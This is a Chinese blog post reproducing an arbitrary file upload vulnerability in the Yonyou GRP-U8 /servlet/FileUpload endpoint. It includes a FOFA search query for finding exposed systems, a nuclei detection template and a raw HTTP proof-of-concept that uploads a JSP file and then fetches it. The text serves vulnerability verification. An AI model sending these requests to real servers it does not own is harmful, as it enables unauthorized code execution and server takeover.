用友GRP-U8-FileUpload任意文件上传漏洞复现

已于 2024-10-09 16:16:49 修改
阅读量1.1k 收藏 16
点赞数 26
文章标签: 网络安全
于 2024-10-08 22:57:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73334898/article/details/142771417
版权

fofa:app="用友-GRP-U8"

nuclei poc:

id: yonyou-grp-u8-fileupload-fileupload

info:
  name: 用友GRP-U8 FileUpload 文件上传漏洞
  author: fgz
  severity: critical
  description: 用友GRP-U8行政事业内控管理软件是一款专门针对行政事业单位开发的内部控制管理系统,旨在提高内部控制的效率和准确性。该软件/servlet/FileUpload接口存在文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
  metadata:
    max-request: 1
    fofa-query: app="用友-GRP-U8"
    verified: true
variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}"
  file_content: "{{to_lower(rand_text_alpha(20))}}"
requests:
  - raw:
      - |+
        POST /servlet/FileUpload?fileName={{file_name}}.jsp&actionID=update HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Connection: close
        
        <% out.println("{{file_content}}");%>

      - |
        GET /R9iPortal/upload/{{file_name}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

poc

POST /servlet/FileUpload?fileName=test.jsp&actionID=update HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0
Content-Length: 51
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

<% out.println("This page has a vulnerability!");%>

ip/R9iPortal/upload/test.jsp

l666aaal
关注
用友NC FileUploadServlet 反序列化RCE漏洞复现
0xSec
12-04 2059
用友 NC nc.file.pub.imple.FileUploadServlet 反序列化漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友 NC FormulaViewAction SQL注入漏洞复现
0xSec
04-09 1383
用友NC /service/~iufo/com.ufida.web.action.ActionServlet 接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
fileupload | servlet 接受文件
qq_42777577的博客
06-04 647
form表单提交数据到servlet后,使用fileupload进行接收。 fileupload 是由 apache 的 commons 组件提供的上传组件。它最主要的工作就是帮我们解析 request.getInputStream()。 fileupload 组件需要的JAR包有: commons-fileupload.jar,核心包; commons-io.jar,依赖包。 fileuploa...
用友filereceiveservlet-fileupload-CNVD-2023-85593
qq_36334672的博客
01-25 751
用友NC6.5。
用友NC任意文件上传漏洞复现
热门推荐
Adminxe的博客
12-14 1万+
0x00 事件描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。 用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。 0x01 漏洞原理 根据文档,FileRece..
用友GRP-U8 内控管理软件/servlet/FileUpload 任意文件上传漏洞复现
0xSec
12-23 1295
用友GRP-U8内控管理软件存在任意文件(/servlet/FileUpload上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器。
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0,附工具下载链接。
最新发布
白帽子黑客SuperherRo
09-22 674
红蓝对抗重点OA系统漏洞利用工具新年贺岁版V2.0的设计中旨是为了帮助各位师傅在渗透测试和挖洞中以及攻防演练中能够快速对OA系统进行快速定位进行漏洞检测和利用.,目前已实现20款OA系统的漏洞检测和利用,共133个漏洞.听说day一打一个准,也欢迎各位师傅补充漏洞和反馈误报,我们将积极作出调整和完善.已实现OA:通达、泛微、万户、致远、用友、蓝凌、极限、红帆、华天、金蝶、金和、启莱、新点、信呼、一米、致翔、智明、宏景、广联达、易宝共20款OA系统漏洞检测和利用.支持单个或批量检测利用.
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
08-21 4341
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
红队攻防文库
正是修行时
08-23 618
各家兴便是天下大同
2023HW护网100+个漏洞poc
Yb528970805的博客
09-19 3654
20 . Metabase validate 远程命令执行漏洞CVE-2023-38646。13 . HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC。3 . Adobe ColdFusion 反序列化漏洞CVE-2023-29300。25 . Panabit iXCache网关RCE漏洞CVE-2023-38646。65 . 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC。66 . 泛微E-Office9文件上传漏洞 CVE-2023-2648 POC。
漏洞复现--用友GRP-U8-FileUpload任意文件上传
qq_53003652的博客
12-26 811
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。该产品存在任意文件上传漏洞。访问/R9iPortal/upload/test.jsp。
使用FileUpload实现Servlet的文件上传
weixin_30633405的博客
04-26 493
简介 FileUpload 是 Apache commons下面的一个子项目,用来实现Java环境下的文件上传功能。 FileUpload链接 FileUpload 是基于Apache的Commons IO的,所以在使用之前需要先在BuildPath种添加Commons IO。 Commons IO链接 1.在项目种添加Commons IO和FileUpload 1.1下载Comm...
JAVA文件上传 ServletFileUpLoad 实例
x_san3的博客
09-10 1831
1.  jsp &lt;%@ page language="java" contentType="text/html" pageEncoding="utf-8"%&gt; &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;文件上传&lt;/title&gt; &lt;/h
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9468
用友NC 漏洞汇总
servlet实现上传附件
人生若只如初见的博客
07-17 656
一、简单介绍 使用 Servlet上传附件 原理上还是蛮简单的,首先获取上传的附件对象,然后做一些简单处理 后写入到指定路径的磁盘中。 二、准备条件 common-io.jar ,下载地址:http://commons.apache.org/io/download_io.cgi common-upload.jar ,下载地址:http://jakarta.apache.org/commons/f...
ServletFileUpload API详解
Leon_Jinhai_Sun的博客
03-28 3667
ServletFileUpload 1.ServletFileUpload upload=new ServletFileUpload(factory); 创建一个上传工具,指定使用缓存区与临时文件存储位置. 2.List<FileItem> items=upload.parseRequest(request); 它是用于解析request对象,得到所有上传项.每一个F...
漏洞复现用友GPR-U8 slbmbygr SQL注入漏洞
今天是几号的博客
10-03 1907
在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png。用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。POC:拼接/u8qx/slbmbygr.jsp?使用SQLmap进行注入利用。
图像数据库
杨燕丹的博客
04-04 1906
本文转载自:图像数据库 ImageNet          ImageNet是一个计算机视觉系统识别项目,是目前世界上图像识别最大的数据库。是美国斯坦福的计算机科学家李飞飞模拟人类的识别系统建立的。能够从图片识别物体。目前已经包含14197122张图像,是已知的最大的图像数据库。每年的ImageNet大赛更是魂萦梦牵着国内外各个名校和大型IT公司以及网络巨头的心。图像如下图所示,需
用友Grp-U8v10.5明细账打印补丁发布
结合以上分析,该补丁是为了解决用友Grp-U8政务软件v10.5版本在打印明细账时遇到的一次性打印问题而开发的,通过特定的注册文件、说明文档和模板文件来增强软件的功能。用户需要在支持的数据库环境下安装,安装后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值